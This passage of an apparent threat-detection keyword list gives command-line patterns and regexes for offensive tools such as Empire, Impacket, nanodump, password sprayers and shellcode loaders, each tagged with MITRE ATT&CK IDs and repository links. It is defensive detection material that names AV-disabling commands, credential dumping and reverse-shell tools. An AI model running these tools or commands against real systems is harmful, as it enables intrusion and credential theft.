-FindAmsiSignatures*",".{0,1000}\s\-ServerUri\s.{0,1000}\s\-FindAmsiSignatures.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","0","N/A","7","4","382","71","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z" "* service -dump all-services.json*",".{0,1000}\sservice\s\-dump\sall\-services\.json.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","10","9","890","111","2024-04-07T09:45:59Z","2023-04-04T06:24:07Z" "* --service fortynorth*",".{0,1000}\s\-\-service\sfortynorth.{0,1000}","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","0","N/A","10","2","194","29","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" "* -ServiceName * -PipeName *",".{0,1000}\s\-ServiceName\s.{0,1000}\s\-PipeName\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Get-System.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* servicetags.nse*",".{0,1000}\sservicetags\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* --session=allrules --wordlist*",".{0,1000}\s\-\-session\=allrules\s\-\-wordlist.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "* --SessionEnum --Host *",".{0,1000}\s\-\-SessionEnum\s\-\-Host\s.{0,1000}","offensive_tool_keyword","ADCollector","ADCollector is a lightweight tool that enumerates the Active Directory environment","T1087 - T1018 - T1069 - T1482","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/dev-2null/ADCollector","1","0","N/A","7","7","619","83","2022-07-30T05:27:15Z","2019-05-15T06:42:20Z" "* --set-as-owned smart -bp * kerberos * --kdc-ip *",".{0,1000}\s\-\-set\-as\-owned\ssmart\s\-bp\s.{0,1000}\skerberos\s.{0,1000}\s\-\-kdc\-ip\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "* Set-MpPreference -DisableIOAVProtection *",".{0,1000}\sSet\-MpPreference\s\-DisableIOAVProtection\s.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "* SetMzLogonPwd *",".{0,1000}\sSetMzLogonPwd\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "* set-objectowner * -target-sid * -owner-sid *",".{0,1000}\sset\-objectowner\s.{0,1000}\s\-target\-sid\s.{0,1000}\s\-owner\-sid\s.{0,1000}","offensive_tool_keyword","acltoolkit","acltoolkit is an ACL abuse swiss-army knife. It implements multiple ACL abuses","T1222.001 - T1222.002 - T1046","TA0007 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/zblurx/acltoolkit","1","0","N/A","N/A","2","113","14","2023-02-03T10:27:45Z","2022-01-12T22:45:49Z" "* setoolkit*",".{0,1000}\ssetoolkit.{0,1000}","offensive_tool_keyword","social-engineer-toolkit","The Social-Engineer Toolkit is an open-source penetration testing framework designed for social engineering. SET has a number of custom attack vectors that allow you to make a believable attack quickly. SET is a product of TrustedSec","T1566 - T1598","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/trustedsec/social-engineer-toolkit","1","0","N/A","N/A","10","10238","2645","2023-12-21T20:10:33Z","2012-12-31T22:01:33Z" "* -sgn -syscalls *",".{0,1000}\s\-sgn\s\-syscalls\s.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "* -sgn -unhook -antidebug *",".{0,1000}\s\-sgn\s\-unhook\s\-antidebug\s.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "* shadow auto -u * -p * -account *",".{0,1000}\sshadow\sauto\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-account\s.{0,1000}","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","2135","293","2024-04-24T10:28:14Z","2021-10-06T23:02:40Z" "* --shadow-credentials --shadow-target *",".{0,1000}\s\-\-shadow\-credentials\s\-\-shadow\-target\s.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "* SharpBuster.dll*",".{0,1000}\sSharpBuster\.dll.{0,1000}","offensive_tool_keyword","SharpBuster","This is a C# implementation of a directory brute forcing tool designed to allow for in-memory execution","T1087 - T1112 - T1048.003 - T1105","TA0007 - TA0040 - TA0002","N/A","N/A","Discovery","https://github.com/passthehashbrowns/SharpBuster","1","0","N/A","7","1","60","7","2020-09-02T15:46:03Z","2020-08-31T00:33:02Z" "* SharpBuster.exe*",".{0,1000}\sSharpBuster\.exe.{0,1000}","offensive_tool_keyword","SharpBuster","This is a C# implementation of a directory brute forcing tool designed to allow for in-memory execution","T1087 - T1112 - T1048.003 - T1105","TA0007 - TA0040 - TA0002","N/A","N/A","Discovery","https://github.com/passthehashbrowns/SharpBuster","1","0","N/A","7","1","60","7","2020-09-02T15:46:03Z","2020-08-31T00:33:02Z" "* SharpC2*",".{0,1000}\sSharpC2.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","0","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "* -SharpChromium *",".{0,1000}\s\-SharpChromium\s.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "* SharpDoor.cs*",".{0,1000}\sSharpDoor\.cs.{0,1000}","offensive_tool_keyword","SharpDoor","SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file","T1112 - T1055 - T1562.001","TA0003 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/SharpDoor","1","0","N/A","9","4","309","66","2019-09-30T16:11:24Z","2019-09-29T02:24:07Z" "* SharpDoor.exe*",".{0,1000}\sSharpDoor\.exe.{0,1000}","offensive_tool_keyword","SharpDoor","SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file","T1112 - T1055 - T1562.001","TA0003 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/SharpDoor","1","0","N/A","9","4","309","66","2019-09-30T16:11:24Z","2019-09-29T02:24:07Z" "* -SharpDPAPI -Command *",".{0,1000}\s\-SharpDPAPI\s\-Command\s.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "* SharpEDRChecker*",".{0,1000}\sSharpEDRChecker.{0,1000}","offensive_tool_keyword","SharpEDRChecker","Checks for the presence of known defensive products such as AV/EDR and logging tools","T1083 - T1518.001 - T1063","TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/PwnDexter/SharpEDRChecker","1","0","N/A","8","7","656","94","2023-10-09T11:17:49Z","2020-06-16T10:25:00Z" "* SharpEfsPotato*",".{0,1000}\sSharpEfsPotato.{0,1000}","offensive_tool_keyword","SharpEfsPotato","Local privilege escalation from SeImpersonatePrivilege using EfsRpc.","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bugch3ck/SharpEfsPotato","1","0","N/A","10","3","276","43","2022-10-17T12:35:06Z","2022-10-17T12:20:47Z" "* -SharPersist *",".{0,1000}\s\-SharPersist\s.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "* SharpHose.exe*",".{0,1000}\sSharpHose\.exe.{0,1000}","offensive_tool_keyword","SharpHose","Asynchronous Password Spraying Tool in C# for Windows Environments","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/ustayready/SharpHose","1","0","N/A","10","4","301","63","2023-12-19T21:06:47Z","2020-05-01T22:10:49Z" "* SharpHound.html*",".{0,1000}\sSharpHound\.html.{0,1000}","offensive_tool_keyword","BobTheSmuggler","HTML SMUGGLING TOOL 6 allows you to create HTML files with embedded 7z/zip archives. The tool would compress your binary (EXE/DLL) into 7z/zip file format then XOR encrypt the archive and then hides inside PNG/GIF image file format (Image Polyglots)","T1027 - T1204.002 - T1140","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/TheCyb3rAlpha/BobTheSmuggler","1","0","N/A","10","5","436","44","2024-05-01T17:23:14Z","2024-01-10T08:04:57Z" "* SharpPersistSD.dll*",".{0,1000}\sSharpPersistSD\.dll.{0,1000}","offensive_tool_keyword","SharpPersistSD","A Post-Compromise granular .NET library to embed persistency to persistency by abusing Security Descriptors of remote machines","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/cybersectroll/SharpPersistSD","1","0","N/A","10","1","N/A","N/A","N/A","N/A" "* SharpRDPHijack*",".{0,1000}\sSharpRDPHijack.{0,1000}","offensive_tool_keyword","SharpRDPHijack","SharpRDPHijack is a proof-of-concept .NET/C# Remote Desktop Protocol (RDP) session hijack utility for disconnected sessions","T1021.001 - T1078.003 - T1059.001","TA0002 - TA0008 - TA0006","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/bohops/SharpRDPHijack","1","0","N/A","10","5","407","71","2021-07-25T17:36:01Z","2020-07-06T02:59:46Z" "* SharpRoast.exe*",".{0,1000}\sSharpRoast\.exe.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "* -SharpShares *",".{0,1000}\s\-SharpShares\s.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "* -SharpSniper *",".{0,1000}\s\-SharpSniper\s.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "* SharpSocks *",".{0,1000}\sSharpSocks\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "* -SharpSpray *",".{0,1000}\s\-SharpSpray\s.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "* sharpspray.exe*",".{0,1000}\ssharpspray\.exe.{0,1000}","offensive_tool_keyword","SharpSpray","SharpSpray is a Windows domain password spraying tool written in .NET C#","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/iomoath/SharpSpray","1","0","N/A","10","2","125","21","2021-11-25T19:13:56Z","2021-08-31T16:09:45Z" "* -SharpUp -Command *",".{0,1000}\s\-SharpUp\s\-Command\s.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "* -Sharpview *",".{0,1000}\s\-Sharpview\s.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "* -sharpweb -Command *",".{0,1000}\s\-sharpweb\s\-Command\s.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "* --shell tcsh exegol*",".{0,1000}\s\-\-shell\stcsh\sexegol.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "* Shell3er.ps1*",".{0,1000}\sShell3er\.ps1.{0,1000}","offensive_tool_keyword","Shell3er","PowerShell Reverse Shell","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/yehia-mamdouh/Shell3er","1","0","N/A","9","10","59","12","2023-05-07T16:02:41Z","2023-05-07T15:35:16Z" "* --shellcode *",".{0,1000}\s\-\-shellcode\s.{0,1000}","offensive_tool_keyword","frampton","PE Binary Shellcode Injector - Automated code cave discovery. shellcode injection - ASLR bypass - x86/x64 compatible","T1055 - T1548.002 - T1129 - T1001","TA0002 - TA0003- TA0004 -TA0011","N/A","N/A","POST Exploitation tools","https://github.com/ins1gn1a/Frampton","1","1","N/A","N/A","1","75","18","2019-11-24T22:34:48Z","2019-10-29T00:22:14Z" "* --shellcode *--dc-ip *",".{0,1000}\s\-\-shellcode\s.{0,1000}\-\-dc\-ip\s.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","N/A","N/A","N/A","N/A","N/A" "* --shellcode *--silent*",".{0,1000}\s\-\-shellcode\s.{0,1000}\-\-silent.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","N/A","N/A","N/A","N/A","N/A" "* --shellcode --remoteinject*",".{0,1000}\s\-\-shellcode\s\-\-remoteinject.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","N/A","N/A","N/A","N/A","N/A" "* shellcode_callback.exe*",".{0,1000}\sshellcode_callback\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "* shellcode-xor.py*",".{0,1000}\sshellcode\-xor\.py.{0,1000}","offensive_tool_keyword","killer","evade AVs and EDRs or security tools","T1564 - T1027 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xHossam/Killer","1","0","N/A","10","7","N/A","N/A","N/A","N/A" "* Shhhavoc.py*",".{0,1000}\sShhhavoc\.py.{0,1000}","offensive_tool_keyword","Shhhloader","shellcode loader that compiles a C++ stub to bypass AV/EDR","T1027 - T1055 - T1140 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/icyguider/Shhhloader","1","0","N/A","9","10","1048","172","2024-04-26T14:24:52Z","2021-09-28T16:52:24Z" "* shodan-api.nse*",".{0,1000}\sshodan\-api\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* Shoggoth.exe*",".{0,1000}\sShoggoth\.exe.{0,1000}","offensive_tool_keyword","Shoggoth","Shoggoth: Asmjit Based Polymorphic Encryptor","T1027 - T1045","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/Shoggoth","1","0","N/A","8","6","581","81","2024-04-10T03:04:04Z","2021-12-03T11:55:22Z" "* --show passwd*",".{0,1000}\s\-\-show\spasswd.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "* --show_invalid_creds*",".{0,1000}\s\-\-show_invalid_creds.{0,1000}","offensive_tool_keyword","Spray365","Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/MarkoH17/Spray365","1","0","N/A","N/A","4","325","56","2022-07-14T14:45:57Z","2021-11-04T18:20:39Z" "* --shtinkering*",".{0,1000}\s\-\-shtinkering.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "* --shuffle-users* --spray*",".{0,1000}\s\-\-shuffle\-users.{0,1000}\s\-\-spray.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","10","10","965","105","2023-11-08T17:41:59Z","2022-06-28T00:00:28Z" "* sigflip.*",".{0,1000}\ssigflip\..{0,1000}","offensive_tool_keyword","C2 related tools","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","10","10","948","175","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" "* sigflip.c *",".{0,1000}\ssigflip\.c\s.{0,1000}","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - 